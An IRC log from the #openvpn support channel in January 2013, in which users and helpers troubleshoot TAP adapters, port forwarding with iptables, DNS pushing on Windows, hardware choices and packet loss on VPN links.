13:50 < KaiForce> no, should not redirect gw. just to get to LAN 13:50 < KaiForce> to remote LANS i mean. A work from home person accessing multiple offices. 13:56 <+rob0> Another potential problem is if the LAN or VPN network ranges overlap/conflict. 13:57 < KaiForce> No they are distinct 13:59 < KaiForce> I'm just trying to figure out how to connect the second connection. When I connect more than one, I get "All TAP-Win32 adapters on this system are currently in use." 14:01 -!- daemonoob [~rschultz@68-233-212-42.static-ip.telepacific.net] has joined #openvpn 14:07 < KaiForce> Ok, found it. There is an "addtap.bat" file in the bin folder for OpenVPN GUI. It creates additional TAP adapters (at least on XP, I'll have to see on Win 7) 14:23 -!- cyberspace- [20253@ninthfloor.org] has quit [Remote host closed the connection] 14:24 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn 14:26 -!- brute11k [~brute11k@89.249.235.236] has quit [Quit: Leaving.] 14:27 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 14:39 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 14:39 -!- mode/#openvpn [+v s7r] by ChanServ 14:48 -!- zaki [~guest@93.98.88.82] has joined #openvpn 14:57 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Read error: Connection reset by peer] 14:57 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn 14:58 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Quit: ByeBye] 15:38 -!- wh1p [~angus@host-2-100-148-6.as13285.net] has quit [Quit: Leaving] 15:52 -!- wh1p [~angus@host-2-100-148-6.as13285.net] has joined #openvpn 15:53 -!- corretico [~luis@190.211.93.38] has quit [Ping timeout: 245 seconds] 15:57 -!- corretico [~luis@190.211.93.38] has joined #openvpn 16:01 -!- KaiForce [~chatzilla@adsl-70-228-65-227.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.89 [Firefox 18.0/20130104151925]] 16:07 -!- JackWinter1 [~jack@vodsl-4655.vo.lu] has quit [Quit: ZNC - http://znc.in] 16:08 -!- p3rror [~mezgani@41.249.97.52] has joined #openvpn 16:09 -!- JackWinter [~jack@vodsl-4655.vo.lu] has joined #openvpn 16:17 -!- swat [~swat@ubuntu/member/swat] has joined #openvpn 16:28 -!- s34n [~chatzilla@ip-208-76-93-210.mvdsl.com] has left #openvpn [] 16:31 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn 16:32 -!- p3rror [~mezgani@41.249.97.52] has quit [Quit: Leaving] 16:45 -!- swat [~swat@ubuntu/member/swat] has quit [Ping timeout: 260 seconds] 17:07 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 17:15 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has quit [Ping timeout: 264 seconds] 17:21 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 17:21 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Ping timeout: 276 seconds] 17:28 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 17:58 -!- kusznir [~kusznir@76.178.145.28] has joined #openvpn 17:58 < kusznir> Hi all: quick question: Does anyone know of a rackmount switch currently available (preferably 16-port, 100base-T) that has internal OpenVPN support? 18:01 < wh1p> openvpn is not something you would find in a switch rather something more like a router 18:04 < wh1p> kusznir: i would advise building a linux box and setting up openvpn on it 18:04 < wh1p> i will have a look see if i can find anything though which has openvpn built in 18:04 < kusznir> wh1p: I guess I was asking if anyone knew of a switch that included enough routing functionality to be a vpn endpoint. 18:05 < wh1p> no afaik that would never work 18:05 < kusznir> I found the Ubiquiti EdgeRouter, but it isn't actually shipping yet. 18:05 < kusznir> And I've seen other people with "vpn devices" that have ~8 ethernet ports on it. 18:06 < kusznir> I'd like a step up from a consumer-grade router running dd-wrt/openwrt hooked up to a switch. 18:06 < kusznir> An alix box would work I know...http://store.netgate.com/ALIX2D2-Kit-Black-Unassembled-P187C86.aspx 18:06 <@vpnHelper> Title: ALIX.2D2 Kit Black Unassembled @ Netgate (at store.netgate.com) 18:06 < wh1p> have a look at these products i hezard that some of them might support openvpn 18:06 < wh1p> http://www.wifi-stock.co.uk/products/routerboards-mikrotik.html 18:06 <@vpnHelper> Title: Wifi-stock.co.uk - Routerboards (Mikrotik) - WiFi Networking products at lowest prices in UK and Ireland (at www.wifi-stock.co.uk) 18:07 < kusznir> Also curious how common the hardware accelerated encryption is...I don't think it will be a big deal (don't plan on pushing high data rates), but I am also talking fairly weak processors... 18:08 < kusznir> My understanding is the geode processors have built-in hardware encryption engine that I'm told OpenVPN will take advantage of. 18:08 <@dazo> kusznir: build your own using a supermicro server? they got quite nicely priced 1U rack mountable servers 18:08 <@dazo> I dunno about geode ... but Intel CPUs with AES-NI instructions works very well 18:10 <@dazo> http://www.supermicro.nl/products/system/1U/ 18:10 <@vpnHelper> Title: Supermicro | Products | SuperServers | 1U (at www.supermicro.nl) 18:12 < kusznir> dazo: do you know if the atom CPUs have the instruction? 18:12 <@dazo> kusznir: dunno ... gotta check Intel's specs on their 'ark' site .. 18:13 <@dazo> kusznir: seems not ... http://ark.intel.com/products/71267/Intel-Atom-Processor-S1260-1MB-Cache-2_00-GHz 18:15 <@dazo> This one got AES-NI ... http://www.supermicro.nl/products/system/1U/5017/SYS-5017P-TF.cfm / http://ark.intel.com/products/65704/Intel-Core-i5-3610ME-Processor-3M-Cache-up-to-3_30-GHz 18:15 <@vpnHelper> Title: Supermicro | Products | SuperServers | 1U | 5017P-TF (at www.supermicro.nl) 18:15 <@dazo> (same compact box, but far more power in the CPU) 18:15 < kusznir> I was looking to avoid a full-fledged server install. This is supporting 15 embedded systems moving about 25k every 15min over a VPN. 18:16 <@dazo> kusznir: install Scientific Linux 6 ... and you'll get all updates going in automatically .... even embedded stuff needs to be updated regularly too, which is often a more cumbersome process 18:17 <@dazo> (and iirc, Scientific Linux 6 will have updates going on until 2020) 18:18 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn [] 18:27 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Quit: emmanuelux] 18:29 -!- emmanuelux [~emmanuelu@vpn7.freedom-ip.com] has joined #openvpn 18:31 <@raidz> OpenVPN IOS App now Available in the App Store 18:34 -!- kunji [~Kunji@141.216.172.169] has joined #openvpn 18:34 < dioz> can i do server-bridge 192.168.0.1 255.255.255.0 192.168.0.1 192.168.0.1 ? 18:35 < dioz> tap 18:35 <@raidz> https://itunes.apple.com/us/app/openvpn-connect/id590379981 18:35 <@vpnHelper> Title: OpenVPN Connect for iPhone 3GS, iPhone 4, iPhone 4S, iPhone 5, iPod touch (3rd generation), iPod touch (4th generation), iPod touch (5th generation) and iPad on the iTunes App Store (at itunes.apple.com) 18:35 < dioz> coool 18:37 < dioz> the server-bridge objective indicates ip address, subnet, range, range 18:37 < kunji> dioz: umm, wouldn't that try to give out the server's ip to the connecting client? 18:37 < kunji> dioz: I don't think that first ip should be in the range. 18:37 < dioz> there is no range 18:37 < dioz> it's just a single ip 18:39 < kunji> dioz: But isn't that the ip used on the virtual interface of the server, so it should not be an ip the server gives out to a client, I think you should use at least 2 ips, one for the server, and one for the client, aka server-bridge 192.168.0.1 255.255.255.0 192.168.0.2 192.168.0.2 18:40 < kunji> I'm pretty new to this though, hmm, pekster would know, stick around and he'll see it eventually. 18:45 <@dazo> !ios 18:45 <@dazo> !iphone 18:45 <@vpnHelper> "iphone" is (#1) http://github.com/jfx2006/OpenVPN_iphone/downloads for precompiled iphone binaries or (#2) http://modmyi.com/cydia/package.php?id=15784 for the gui portion or (#3) http://www.zdnet.com/blog/hardware/ubuntu-lucid-lynx-1004-can-read-your-iphones-secrets/8424 <-- be aware of that before putting your keys on an iphone or (#4) see http://www.guizmovpn.com/ for an iOS client for OpenVPN for 18:45 <@vpnHelper> iPhone and iPad. 18:46 <@dazo> !forget iphone 1 18:46 <@vpnHelper> Joo got it. 18:46 <@dazo> !iphone 18:46 <@vpnHelper> "iphone" is (#1) http://modmyi.com/cydia/package.php?id=15784 for the gui portion or (#2) http://www.zdnet.com/blog/hardware/ubuntu-lucid-lynx-1004-can-read-your-iphones-secrets/8424 <-- be aware of that before putting your keys on an iphone or (#3) see http://www.guizmovpn.com/ for an iOS client for OpenVPN for iPhone and iPad. 18:46 <@dazo> !forget iphone 1 18:46 <@vpnHelper> Joo got it. 18:46 <@dazo> !iphone 18:46 <@vpnHelper> "iphone" is (#1) http://www.zdnet.com/blog/hardware/ubuntu-lucid-lynx-1004-can-read-your-iphones-secrets/8424 <-- be aware of that before putting your keys on an iphone or (#2) see http://www.guizmovpn.com/ for an iOS client for OpenVPN for iPhone and iPad. 18:46 <@dazo> !forget iphone 2 18:46 <@vpnHelper> Joo got it. 18:47 <@dazo> !learn iphone as "OpenVPN is now available for iOS in the App Store 18:47 <@vpnHelper> Error: No closing quotation 18:47 <@dazo> !learn iphone as OpenVPN is now available for iOS in the App Store 18:47 <@vpnHelper> Joo got it. 18:47 <@dazo> !iphone 18:47 <@vpnHelper> "iphone" is (#1) http://www.zdnet.com/blog/hardware/ubuntu-lucid-lynx-1004-can-read-your-iphones-secrets/8424 <-- be aware of that before putting your keys on an iphone or (#2) OpenVPN is now available for iOS in the App Store 19:02 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has quit [Read error: Operation timed out] 19:03 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has joined #openvpn 19:03 -!- donhoe [~jeepers@31.193.12.99] has quit [Remote host closed the connection] 19:13 -!- Controlsfreek [~Controlsf@cpe-69-204-135-43.nycap.res.rr.com] has quit [Read error: Connection reset by peer] 19:14 -!- ducblangis [~Ducblangi@24-117-207-111.cpe.cableone.net] has quit [Ping timeout: 276 seconds] 19:14 -!- Controlsfreek [~Controlsf@cpe-69-204-135-43.nycap.res.rr.com] has joined #openvpn 19:35 -!- daemonoob [~rschultz@68-233-212-42.static-ip.telepacific.net] has quit [Quit: Leaving] 19:40 < kunji> ?.. I'm still connected to this, hmm 19:42 -!- raidz is now known as raidz_away 19:53 -!- Olipro [~Olipro@d.e.r.p.6.a.1.0.d.d.0.7.2.0.1.0.a.2.ip6.arpa] has joined #openvpn 19:53 -!- Olipro [~Olipro@d.e.r.p.6.a.1.0.d.d.0.7.2.0.1.0.a.2.ip6.arpa] has quit [Changing host] 19:53 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has joined #openvpn 19:57 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has quit [Read error: Connection reset by peer] 19:59 -!- b1rkh0ff [~b1rkh0ff@178.77.7.250] has quit [Ping timeout: 244 seconds] 19:59 -!- kunji [~Kunji@141.216.172.169] has quit [Read error: Connection reset by peer] 19:59 -!- kunji1 [~Kunji@141.216.172.169] has joined #openvpn 20:10 -!- dazo is now known as dazo_afk 20:11 -!- kunji1 [~Kunji@141.216.172.169] has quit [Read error: Connection reset by peer] 20:27 -!- Guest24601 [~root@216.17.109.26] has joined #openvpn 20:31 -!- s51itxsyc [~s51itxsyc@202.108.130.138] has joined #openvpn 20:43 -!- Guest24601 [~root@216.17.109.26] has left #openvpn [] 20:43 -!- cosmicgate [~root@216.17.109.26] has joined #openvpn 20:43 < cosmicgate> Hi, 20:43 < cosmicgate> may i know what is the default encryption cipher for openvpn? 20:46 -!- nucl3ar [~atom@31.193.12.99] has joined #openvpn 21:03 -!- corretico [~luis@190.211.93.38] has quit [Ping timeout: 248 seconds] 21:04 -!- corretico [~luis@190.211.93.38] has joined #openvpn 21:06 -!- nucl3ar [~atom@31.193.12.99] has quit [Quit: g'byte] 21:27 -!- cosmicgate [~root@216.17.109.26] has quit [Ping timeout: 255 seconds] 21:31 -!- CrashTM [~CrashTM@69.162.93.219] has joined #openvpn 21:31 < CrashTM> how might someone go about forwarding a port to a openvpn client 21:32 < CrashTM> iptables -t nat -A PREROUTING -p tcp --dport (port) -j DNAT --to-destination (client ip) 21:33 < CrashTM> iptables -A FORWARD -s (client ip) -p tcp --dport (port) -j ACCEPT 21:33 < CrashTM> does that look right 21:41 < CrashTM> !def1 21:41 <@vpnHelper> "def1" is (#1) used in redirect-gateway, Add the def1 flag to override the default gateway by using 0.0.0.0/1 and 128.0.0.0/1 rather than 0.0.0.0/0. This has the benefit of overriding but not wiping out the original default gateway. or (#2) please see --redirect-gateway in the man page ( !man ) to fully understand or (#3) push "redirect-gateway def1" 21:42 < ngharo> !linportforward 21:42 <@vpnHelper> "linportforward" is (#1) to forward port 80 tcp to a vpn client, use this (replacing with the real ip of the server, and with the clients VPN ip) or (#2) iptables -t nat -A PREROUTING -i eth0 -d -p tcp --dport 80 -j DNAT --to or (#3) iptables -A FORWARD -m state --state NEW,ESTABLISHED,RELATED -i eth0 -p tcp --dport 80 -j ACCEPT 21:46 -!- Castor_ [Castor_@CPE-72-133-200-232.wi.res.rr.com] has joined #openvpn 21:46 -!- uberushaximus [~uberushax@shepard.sypherz.com] has joined #openvpn 22:00 -!- CrashTM [~CrashTM@69.162.93.219] has quit [Read error: Connection reset by peer] 22:01 -!- CrashTM [~CrashTM@cpe-98-144-34-109.wi.res.rr.com] has joined #openvpn 22:01 -!- CrashTM [~CrashTM@cpe-98-144-34-109.wi.res.rr.com] has quit [Client Quit] 22:25 -!- ben1066 [~quassel@unaffiliated/ben1066] has quit [Read error: Connection reset by peer] 22:25 -!- ben1066 [~quassel@2a03:b200:9::824e:1e6e] has joined #openvpn 22:25 -!- ben1066 [~quassel@2a03:b200:9::824e:1e6e] has quit [Changing host] 22:25 -!- ben1066 [~quassel@unaffiliated/ben1066] has joined #openvpn 22:53 -!- cosmicgate [~root@216.17.109.26] has joined #openvpn 22:58 -!- cosmicgate [~root@216.17.109.26] has quit [Quit: bye] --- Day changed Thu Jan 17 2013 00:00 -!- cosmicgate [~root@216.17.109.26] has joined #openvpn 00:02 -!- blackness is now known as blackmagic 00:11 -!- cosmicgate [~root@216.17.109.26] has quit [] 00:11 -!- |Mike| [mike@2001:0:53aa:64c:28ac:7181:2b66:b9f1] has quit [Ping timeout: 260 seconds] 00:12 -!- |Mike| [mike@2001:0:53aa:64c:28ac:7181:2b66:b9f1] has joined #openvpn 00:42 -!- brute11k [~brute11k@89.249.235.236] has joined #openvpn 00:50 -!- emmanuelux [~emmanuelu@vpn7.freedom-ip.com] has quit [Quit: emmanuelux] 01:28 -!- Varazir_ is now known as Varazir 01:38 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has joined #openvpn 01:45 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 260 seconds] 01:45 -!- Minnebo [~Minnebo@office.exabyte.be] has joined #openvpn 01:45 < Minnebo> Guys, i'm still stuck with one problem 01:45 < Minnebo> Can someone check my server/client config? 01:46 -!- cosmicgate [~root@216.17.109.26] has joined #openvpn 01:46 < Minnebo> I can connect and everything works like a charm, but I cannot get the route work to use \\sbs2011 to get to the shares 01:46 < Minnebo> my server is on 192.168.100.1 01:47 < Minnebo> so I did an push "route 192.168.100.0 255.255.255.0" 01:47 < Minnebo> when I do print route on my client pc 01:48 < Minnebo> I see that the route is added 01:48 <+pekster> Is your DNS or WINS set up to do resolution across the VPN correctly? 01:48 <+pekster> You can't expect private names to resolve without setting that up 01:49 < Minnebo> where can I set those things? 01:49 < Minnebo> !dns 01:49 < Minnebo> :D 01:49 <@vpnHelper> "dns" is (#1) Level3 open recursive DNS server at 4.2.2.[1-6] or (#2) Google open recursive DNS server at 8.8.8.8 / 8.8.4.4 or (#3) you might be looking for !pushdns 01:49 < Minnebo> !pushdns 01:49 <@vpnHelper> "pushdns" is (#1) push "dhcp-option DNS a.b.c.d" to push dns to the client or (#2) http://thread.gmane.org/gmane.network.openvpn.user/25139/focus=25147 see that mail archive for some info on pushing dns or (#3) http://article.gmane.org/gmane.network.openvpn.user/25149 for a perm fix via regedit or (#4) in unix you'll use the update-resolv-conf script or (#5) also 01:49 <@vpnHelper> http://comments.gmane.org/gmane.network.openvpn.user/31975 reports --register-dns as fixing their problems pushing DNS to windows 7 01:50 <+pekster> DNS on windows is kind of a PITA: maybe that --register-DNS option will help, but I spent many hours one of my prior jobs cooking up a solution to guarentee that internal DNS worked. I just wish my solution wasn't locked up in a former employer's SVN repo :( 01:51 <+pekster> Windows does strange things when multi-homed, especially if you require automatic suffix support (which you apparently do since you're not using a FQDN) 01:51 < Minnebo> pekster, i could trick it 01:51 < Minnebo> by adjusting the hosts file 01:51 <+pekster> Using a FQDN might help, if you push the domain along with the DNS server 01:51 <+pekster> \\server.your.domain 01:52 < Minnebo> but then again when I go to 192.168.100.1 it goes to my local adress 01:52 <+pekster> It's still ugly because the DNS servers and "search suffix" for the domain are attached to the adapter, not system-wide 01:52 < Minnebo> Its odd that pptp vpn doenst have these issues :p 01:52 <+pekster> It just has issues with being a known inseucre protocol for over a decade and being fairly trivial to attack since mid 2012 01:53 < Minnebo> i'll test some this afternoon, have to hit the road 01:53 < Minnebo> laters 01:56 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn 01:57 -!- Azrael808 [~peter@212.161.9.162] has quit [Remote host closed the connection] 01:59 -!- Minnebo [~Minnebo@office.exabyte.be] has quit [Ping timeout: 246 seconds] 01:59 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 01:59 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Remote host closed the connection] 01:59 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn 02:05 -!- Azrael808 [~peter@212.161.9.162] has quit [Quit: Ex-Chat] 02:15 -!- Halagan [~Miranda@a4.evona.ba.cust.gts.sk] has joined #openvpn 02:16 -!- |Mike| [mike@2001:0:53aa:64c:28ac:7181:2b66:b9f1] has quit [Ping timeout: 264 seconds] 02:16 -!- |Mike| [mike@2001:0:53aa:64c:28ac:7181:2b66:b9f1] has joined #openvpn 02:21 < Halagan> Hi guys .. We installed last version of iKey1000SDK (4.2.0) for iKey 1032 under OS Windows 7 x64. 02:21 < Halagan> App installed correctly and utility shows some information about token. 02:21 < Halagan> We have openvpn certificate on this iKey and we use this certificate to login in vpn site. 02:21 < Halagan> When we run openvpn client, it appear error with message “the ordinal 322 could not be located in the dynamic link library libeay32.dll”. So I copied this file and file ssleay32.dll from windows\system32 to openvpn\bin, where I replaced original openvpn files. Then i started again openvpn client, and opevpn daemon crash with error (file with this error is in attachment). We use openvpn-2.2.2-install.exe, but I have also tried ne 02:21 < Halagan> w version openvpn-install-2.3.0.exe with the same results. Under OS Windows XP 32 bit with iKey1000SDK (4.0.0.4) run this certificate on token without problems. 02:24 < Halagan> And this is attachment error Faulting application name: openvpn.exe, version: 2.3.0.0, time stamp: 0x5098c6eb 02:24 < Halagan> Faulting module name: openvpn.exe, version: 2.3.0.0, time stamp: 0x5098c6eb 02:24 < Halagan> Exception code: 0xc0000005 02:24 < Halagan> Fault offset: 0x00075b73 02:24 < Halagan> Faulting process id: 0xafc 02:24 < Halagan> Faulting application start time: 0x01cdd6c4db23e169 02:24 < Halagan> Faulting application path: C:\Program Files (x86)\OpenVPN\bin\openvpn.exe 02:24 < Halagan> Faulting module path: C:\Program Files (x86)\OpenVPN\bin\openvpn.exe 02:24 < Halagan> Report Id: 1a456b8b-42b8-11e2-85e2-ac7289579a3a 02:30 < blackmagic> Please use a pastebin for pastes longer then 4 lines. 02:31 < blackmagic> makes reading much easier. 02:31 -!- Guest70136 [~Olipro@d.e.r.p.6.a.1.0.d.d.0.7.2.0.1.0.a.2.ip6.arpa] has joined #openvpn 02:42 < Halagan> Okay .. here is pastebin link .. http://pastebin.com/fhUQfMwE 02:43 < Halagan> And i also tried new version 2.3.0 OpenVPN .. 02:50 -!- cosmicgate [~root@216.17.109.26] has quit [] 02:56 < Halagan> Please suggest me solution. 02:57 -!- swat [~swat@ubuntu/member/swat] has joined #openvpn 02:57 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Ping timeout: 276 seconds] 03:05 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 03:15 -!- swat [~swat@ubuntu/member/swat] has quit [Ping timeout: 255 seconds] 03:19 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 03:22 -!- JackWinter [~jack@vodsl-4655.vo.lu] has quit [Quit: ZNC - http://znc.in] 03:24 -!- JackWinter [~jack@vodsl-4655.vo.lu] has joined #openvpn 03:26 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 03:26 -!- thinkHell [~Hell@85.15.47.27] has joined #openvpn 03:34 -!- s51itxsyc [~s51itxsyc@202.108.130.138] has quit [Quit: Lost terminal] 03:49 -!- M-Technic [~voltron@c-67-188-136-26.hsd1.ca.comcast.net] has quit [Ping timeout: 260 seconds] 03:56 -!- APTX [~APTX@unaffiliated/aptx] has quit [Read error: Operation timed out] 03:56 -!- M-Technic [~voltron@c-67-188-136-26.hsd1.ca.comcast.net] has joined #openvpn 04:04 -!- M-Technic [~voltron@c-67-188-136-26.hsd1.ca.comcast.net] has quit [Ping timeout: 248 seconds] 04:11 -!- cherwin [~cherwin@ip4da6274e.direct-adsl.nl] has quit [Ping timeout: 248 seconds] 04:12 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn 04:12 -!- cherwin [~cherwin@ip4da6274e.direct-adsl.nl] has joined #openvpn 04:20 -!- igor__ [~igor@pd907e599.dip0.t-ipconnect.de] has joined #openvpn 04:27 -!- eugenmayer1 [~EugenMaye@2a02:8071:b258:c001:ec3e:a40d:77ad:6be2] has joined #openvpn 04:28 < eugenmayer1> Hello. Iam having like 40 VPN clients into 4 OpenVPN nets ( all served by one server ). To locations, one new office (all clients there, all OSX) and a customer location do have huge bandwith issues ( download 30kbit/s ). The networks are based on UDP and it seems it could be based on paket loss. Any suggestion? 04:29 < eugenmayer1> i used iperf with -u and got an package los of 7-10% to the vpn server ( from the outer net, not the tunnel) 04:33 <+pekster> eugenmayer1: That's a significant amount of packet loss; if you're familiar with TCP's restart mechanism in the face of lost packets, that could easily account for your low throughput. It's possible window tuning could help with TCP streams, but that still won't change the fundamental problem around that bad of a network link 04:34 < eugenmayer1> pekster: so you suggest, as i do, its an ISP issue? 04:34 -!- p3rror [~mezgani@2001:0:53aa:64c:281c:646c:d605:16f1] has joined #openvpn 04:34 < eugenmayer1> pekster: as its UDB, how it could be due to the TCP's restart mechanism? 04:35 <+pekster> TCP is still used inside the tunnel for anything TCP-based 04:35 < eugenmayer1> I mean, since UDP is stateless and has no "ACK" its always very sensible to bad connection/paket loss 04:35 < eugenmayer1> right? 04:36 <+pekster> Rigiht. But if you, say, ftp across the VPN link, the local system doesn't care "why" the packet was lost (ie: no ack comes back for it) so it re-tries 04:36 <+pekster> That in turn geneates another UDP packet, that in your case is also 7-10% likely to be lost 04:36 < eugenmayer1> yeah sure. Combined that, this will have an bandwith issues, thats clear 04:36 -!- APTX [~APTX@unaffiliated/aptx] has joined #openvpn 04:37 <+pekster> Try a traceroute tool that can show you loss/latency for each hop between your endpoints (I like the "mtr" tool for this, but there are others) and see what you find 04:37 <+pekster> At ~10% latency, you clearly have a problem with the link 04:37 <+pekster> loss, rather 04:38 < eugenmayer1> pekster: so i guess, since my VPN server is vierualized, i have to double check its nothing on that route, check a different server. If i face the same amount of packaet loss on other servers, i guess its ISP-only, right 04:38 < eugenmayer1> pekster: using MTR here 04:39 <+pekster> "nothing on the route" ? I've no clue what that means, but I don't get packet loss even when someone on my network is watching Netflix and another is uploading vacation photos 04:39 < eugenmayer1> i see, right now, a kernel syslog message 04:39 < eugenmayer1> UDP: short packet: From XXXXX to XXXX 04:40 < eugenmayer1> and something like __ratelimie: 11 callbacks supprsed.. 04:40 < eugenmayer1> pekster: i ment, rather e.g. somethign with the virtualized network interface 04:45 -!- eugenmayer [~EugenMaye@2a02:8071:b258:c001:5dcf:eb91:45:15e3] has joined #openvpn 04:49 -!- eugenmayer1 [~EugenMaye@2a02:8071:b258:c001:ec3e:a40d:77ad:6be2] has quit [Ping timeout: 256 seconds] 04:49 -!- b1rkh0ff [~b1rkh0ff@178.77.7.250] has joined #openvpn 04:49 < eugenmayer> pekster: iam having huge internet issue, sorry. Iam using MTR for this kind of tests 04:53 -!- blackmagic [~black@ip98-185-21-138.rn.hr.cox.net] has quit [Ping timeout: 244 seconds] 04:56 <+pekster> eugenmayer: Right. I mean, if you can't even stay connected to IRC without dropping, that's going to impact almost any application that's sending data across the Internet 04:56 <+pekster> The VPNs job is to encapsulate and delivery packets to yoru peer, not to fix that kind of problem 04:56 -!- eugenmayer [~EugenMaye@2a02:8071:b258:c001:5dcf:eb91:45:15e3] has quit [Ping timeout: 256 seconds] 04:56 <+pekster> lol 05:01 -!- thinkHell [~Hell@85.15.47.27] has quit [Read error: Connection reset by peer] 05:04 -!- eugenmayer [~EugenMaye@2a02:8071:b258:c001:657e:9c95:55ed:79ce] has joined #openvpn 05:05 <+pekster> eugenmayer: https://pastee.org/ksz9t 05:05 < eugenmayer> Sorry for my connection, its just going up and down..i guess i missed like anything? ;/ 05:06 -!- blackmagic [~black@ip98-185-21-138.rn.hr.cox.net] has joined #openvpn 05:18 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 05:22 -!- APTX [~APTX@unaffiliated/aptx] has quit [Ping timeout: 248 seconds] 05:22 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 05:23 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 05:23 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 05:24 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 05:25 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 05:31 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 05:33 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 05:34 -!- b1rkh0ff [~b1rkh0ff@178.77.7.250] has quit [Quit: Leaving] 05:36 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 05:39 -!- _br_- [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 05:44 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 05:51 -!- valparaiso [~valparais@ARennes-257-1-48-169.w81-53.abo.wanadoo.fr] has joined #openvpn 05:56 -!- eugenmayer [~EugenMaye@2a02:8071:b258:c001:657e:9c95:55ed:79ce] has quit [Ping timeout: 256 seconds] 06:03 -!- valparaiso [~valparais@ARennes-257-1-48-169.w81-53.abo.wanadoo.fr] has quit [Quit: valparaiso] 06:03 -!- dude123 [~jonathan@cpe-72-191-141-216.stx.res.rr.com] has joined #openvpn 06:03 -!- valparaiso [~valparais@ARennes-257-1-48-169.w81-53.abo.wanadoo.fr] has joined #openvpn 06:04 -!- M-Technic [~voltron@c-67-188-136-26.hsd1.ca.comcast.net] has joined #openvpn 06:04 < dude123> !welcome 06:04 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 06:04 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 06:06 < dude123> question - does openvpn "hide" the user's ip address while on the internet? 06:07 < plaisthos> same as other vpn 06:07 <+pekster> You probably want to see the !redirect output from the bot. You can adjust the default gateway for traffic you don't have a more specific routing entry for, although that's only used while the VPN is connected 06:08 < dude123> !redirect 06:08 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 06:08 <@vpnHelper> http://ircpimps.org/redirect.png 06:13 -!- valparaiso [~valparais@ARennes-257-1-48-169.w81-53.abo.wanadoo.fr] has left #openvpn [] 06:13 -!- dude123 [~jonathan@cpe-72-191-141-216.stx.res.rr.com] has quit [Quit: Leaving] 06:21 -!- p3rror [~mezgani@2001:0:53aa:64c:281c:646c:d605:16f1] has quit [Remote host closed the connection] 06:23 -!- p3rror [~mezgani@2001:0:53aa:64c:281c:646c:d605:16f1] has joined #openvpn 06:24 -!- ihptru [~ihptru@164.138.25.4] has quit [Ping timeout: 276 seconds] 06:37 -!- mattock is now known as mattock_afk 06:37 -!- APTX [~APTX@unaffiliated/aptx] has joined #openvpn 06:50 -!- p3rror [~mezgani@2001:0:53aa:64c:281c:646c:d605:16f1] has quit [Ping timeout: 260 seconds] 06:58 < Halagan> Hi guys, can you please help me with this error ? .. http://pastebin.com/QsLpA6zy 07:00 < dioz> pekster 07:11 -!- ihptru [~ihptru@2a02:2770::21a:4aff:fef3:cdbb] has joined #openvpn 07:13 <+pekster> dioz: sup? 07:19 -!- mattock_afk is now known as mattock 07:21 -!- blackmagic [~black@ip98-185-21-138.rn.hr.cox.net] has quit [Ping timeout: 260 seconds] 07:23 <+pekster> Halagan: I really don't 